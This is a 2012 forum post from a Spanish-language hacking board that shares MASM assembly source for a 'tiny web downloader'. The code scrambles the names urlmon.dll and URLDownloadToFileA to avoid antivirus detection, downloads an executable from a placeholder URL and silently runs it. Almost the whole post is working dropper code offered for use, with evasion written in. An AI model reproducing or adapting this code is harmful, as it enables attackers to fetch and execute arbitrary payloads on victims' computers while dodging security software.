Underc0de - Hacking y seguridad informática

Programación General => ASM => Mensaje iniciado por: ANTRAX en Junio 05, 2012, 04:42:49 pm

Título: Downloader MASM
Publicado por: ANTRAX en Junio 05, 2012, 04:42:49 pm
Código: ASM
  1. ;Tiny Webdownloader by Aphex
  2. ;Hides use of URLDownloadToFileA to foil TDS
  3. ;http://iamaphex.cjb.net
  4.  
  5. .386
  6. .model flat, stdcall
  7. include \masm32\include\kernel32.inc
  8. includelib \masm32\lib\kernel32.lib
  9.  
  10. .data
  11. Url byte 'http://your.isp.goes.here/file.exe', 0
  12. Exe byte '~.exe', 0
  13. Scramble1 byte 'dll', 0
  14. Scramble2 byte '.', 0
  15. Scramble3 byte 'mon', 0
  16. Scramble4 byte 'url', 0
  17. Scramble5 byte 'A', 0
  18. Scramble6 byte 'File', 0
  19. Scramble7 byte 'To', 0
  20. Scramble8 byte 'Download', 0
  21. Scramble9 byte 'URL', 0
  22.  
  23. .data?
  24. UrlMonDll byte 11 dup (?)
  25. UrlDownload byte 19 dup (?)
  26. UrlMon dword ?
  27. UrlDownloadToFile dword ?
  28.  
  29. .code
  30. _main:
  31. ;unscrambles urlmon.dll
  32. invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4
  33. invoke lstrcat, addr UrlMonDll, addr Scramble3
  34. invoke lstrcat, addr UrlMonDll, addr Scramble2
  35. invoke lstrcat, addr UrlMonDll, addr Scramble1
  36.  
  37. ;unscrambles URLDownloadToFileA
  38. invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4
  39. invoke lstrcat, addr UrlDownload, addr Scramble8
  40. invoke lstrcat, addr UrlDownload, addr Scramble7
  41. invoke lstrcat, addr UrlDownload, addr Scramble6
  42. invoke lstrcat, addr UrlDownload, addr Scramble5
  43.  
  44. ;loads urlmon.dll
  45. invoke LoadLibrary, addr UrlMonDll
  46. mov UrlMon, eax
  47.  
  48. ;links URLDownloadToFileA dynamically
  49. invoke GetProcAddress, UrlMon, addr UrlDownload
  50. mov UrlDownloadToFile, eax
  51.  
  52. ;delete previous version
  53. invoke DeleteFile, addr Exe
  54.  
  55. ;downloads the exe
  56. push 0
  57. push 0
  58. push offset Exe
  59. push offset Url
  60. push 0
  61. call UrlDownloadToFile
  62.  
  63. ;runs the exe
  64. invoke WinExec, addr Exe, 0
  65.  
  66. ;exits
  67. invoke ExitProcess, 0
  68.  
  69. end _main

By X-Ray Cat